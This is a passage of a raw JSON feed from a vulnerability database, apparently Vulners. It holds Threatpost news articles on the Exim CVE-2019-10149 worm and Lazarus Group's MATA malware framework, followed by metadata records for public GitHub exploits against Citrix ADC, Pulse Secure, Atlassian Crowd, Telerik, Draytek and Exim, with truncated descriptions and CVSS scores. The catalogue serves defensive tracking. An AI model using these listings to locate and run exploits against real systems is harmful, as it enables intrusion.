Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack of vulnerable systems could allow a malicious actor to gain remote command-execution, take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\nMicrosoft for its part said that while it offers \u201cpartial mitigation,\u201d vulnerable systems are still impacted if an attacker\u2019s IP address is permitted through Network Security Groups, which is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs), its advisory said. \u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server. The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers; Researchers said that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nThe sheer number of vulnerable systems have researchers, vendors and more urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-17T15:02:52", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:22:13", "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs far as victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. It\u2019s purpose is to load various plugins \u2013 up to 15 of them. The perform various functions, including sending the command-and-control (C2) information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating a HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed DACLs. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. Kaspersky has linked DACLs to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) and random IP addresses excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator meanwhile was found in April, having been ported from the Linux version. It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/DACLS RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\u201d\n", "cvss3": {}, "published": "2020-07-22T16:43:44", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-23T23:33:45", "description": "# citrix_adc_netscaler_lfi_scan\n\n![alt text][citrix]\n\nThis Metas...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:37:53", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-10-10T19:00:30", "id": "92A57BC1-BAC9-5C0F-951A-E1FF05D87142", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:48", "description": "# CVE-2020-8193-Citrix-Scanner\n\nScanning for CVE-2020-8193 - Aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-13T10:36:43", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2021-12-15T14:39:48", "id": "F775D2F3-FF1F-529F-B0F3-99AB6A801264", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-06T10:03:57", "description": "# check-your-pulse #\n\n[![GitHub Build Status](https://github.com...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-16T16:32:47", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781"], "modified": "2022-03-06T07:12:20", "id": "62891769-2887-58A7-A603-BCD5E6A6D6F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-18T02:59:21", "description": "# CVE-2019-11580\n## Atlassian Crowd and Crowd Data Center RCE\n\n#...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-17T07:54:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Atlassian Crowd", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-07-17T07:40:09", "id": "291B5382-1EED-522B-869C-C2AFDC4AB400", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:33:50", "description": "# Citrix ADC RCE \r\n\r\n## 0x01 CreateSession\r\n`request`\r\n```\r\nPOST...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-12T13:05:40", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193"], "modified": "2022-03-17T09:38:26", "id": "9C32E281-E6FB-587D-9ECC-F961B7082D43", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-07T00:17:14", "description": "# Citrix ADC Vulns\n\n## CVE List\nhttps://support.citrix.com/arti...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T20:00:17", "type": "githubexploit", "title": "Exploit for Missing Authorization in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193"], "modified": "2022-07-06T23:37:26", "id": "EBBEA4C3-D6F9-53AF-BBE9-D3438C945AB4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-01-12T02:57:38", "description": "<b>[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-19T17:11:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-01-09T21:20:03", "id": "1741E720-F85A-5179-AB8A-D6FA2E185092", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-02T21:29:12", "description": "# CVE-2020-8515\nDraytek CVE-2020-8515 PoC I had kicking about. \n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T22:47:54", "type": "githubexploit", "title": "Exploit for OS Command Injection in Draytek Vigor2960 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2022-06-02T07:25:35", "id": "370515CC-C819-5D01-917D-2DF4728A28F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:37:43", "description": "# CVE-2019-10149\nCVE-2019-10149 : A flaw was found in Exim versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-27T01:03:11", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-05T21:57:04", "id": "ADA0DDA5-BF6D-5656-87DA-B9E2BF0777ED", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T17:36:18", "description": "# eximrce\n\nSimple python socket connection to test if exim is vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-12T03:47:16", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2021-12-15T14:36:31", "id": "53BB099A-E497-5170-9B4B-16FB5A78CF67", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-22T13:26:40", "description": "# PoC-CVE-2019-10149_Exim\nMNEMO-CERT ha desarrollado una PoC que...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-13T23:21:53", "type": "githubexploit", "title": "Exploit for OS Command Injection in Exim", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 